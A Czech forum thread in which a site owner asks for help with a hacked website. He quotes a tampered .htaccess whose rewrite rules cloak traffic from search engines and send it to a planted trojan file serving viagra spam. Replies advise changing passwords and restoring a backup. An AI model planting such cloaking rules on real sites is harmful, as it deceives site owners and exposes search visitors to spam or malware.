Nakažený web

Problémy s internetovými stránkami, internetovým prohlížečem atpod.

Moderátor: Mods_senior

pcurik
nováček
Příspěvky: 4
Registrován: březen 16
Pohlaví: Nespecifikováno
Stav:
Offline

Nakažený web

Příspěvekod pcurik » 26 bře 2016 13:35

Prosím někoho, kdo by odviroval a zabezpečil web.
Google hlásí napadené stránky a search console zobrazuje cizí kód.
Díky moc. Petr Čuřík

Reklama
Uživatelský avatar
Eldan
Level 3.5
Level 3.5
Příspěvky: 691
Registrován: leden 16
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: Nakažený web

Příspěvekod Eldan » 26 bře 2016 15:02

Nějaké bližší informace by nebyly? Takhle vůbec netuším o čem to mluvíš...

pcurik
nováček
Příspěvky: 4
Registrován: březen 16
Pohlaví: Nespecifikováno
Stav:
Offline

Re: Nakažený web

Příspěvekod pcurik » 26 bře 2016 15:21

Jasný. Takže.. Google začal hlásit, že byl web nejspíše napaden hackery. Jde o http://www.zivaexotika.cz/. Je to web bez RS.
Po bližším prozkoumání jsem našel pár vložených věcí. Viz přílohy. Dále je pozměněný .htaccess.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}/rezervacnisystem/common.php -f
RewriteRule ^.*$ /rezervacnisystem/common.php [L]
</IfModule>[L]
</IfModule>


a soubor common.php je trojan.

To, co Google našel vložené do těch stránek, jsou především odkazy na viagru.

Díky
Přílohy
Výstřižek.JPG
problemy_google.JPG

Uživatelský avatar
Eldan
Level 3.5
Level 3.5
Příspěvky: 691
Registrován: leden 16
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: Nakažený web

Příspěvekod Eldan » 26 bře 2016 15:35

Je to hostované na dedikovaném serveru, nebo u hostingu? Mohl být napadený hosting a editace proběhla tím. Pokud je to samostatný web, pak asi někdo "uhodl" vaše přihlašovací údaje - ihned změnit, a s tím i na všech ostatních místech kde je používáte (pokud jste neopatrný a máte stejné heslo na více místech). Samozřejmě soubory vraťte do původního stavu.

pcurik
nováček
Příspěvky: 4
Registrován: březen 16
Pohlaví: Nespecifikováno
Stav:
Offline

Re: Nakažený web

Příspěvekod pcurik » 26 bře 2016 15:45

... hostuji u C4. Problém je, že google zobrazuje vložené kódy, ale když vlezu do souboru, tak tam žádný takový řetězec viditelný není. Tudíž vlastně ani nemám šanci zjistit, jestli je moje záloha čistá (předpokládám, že ano). Jednoduše řečeno - chápu, že možná nebude až tak složité dát web do pořádku, ale já si na to netroufám. Nejsem si jistý "kam sáhnout". Druhý krok potom je kontrola zebezpečení souborů webu - jak?

Uživatelský avatar
Eldan
Level 3.5
Level 3.5
Příspěvky: 691
Registrován: leden 16
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: Nakažený web

Příspěvekod Eldan » 27 bře 2016 12:17

Pokud máte zálohu, u které víte, že je zdravá, nahrál bych tu. Můžete také kontaktovat provozovatele hostingu, určitě vám pomůže zjistit co přesně se vám s webem stalo a případně to i opravit.


Zpět na “Internet a internetové prohlížeče”

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 6 hostů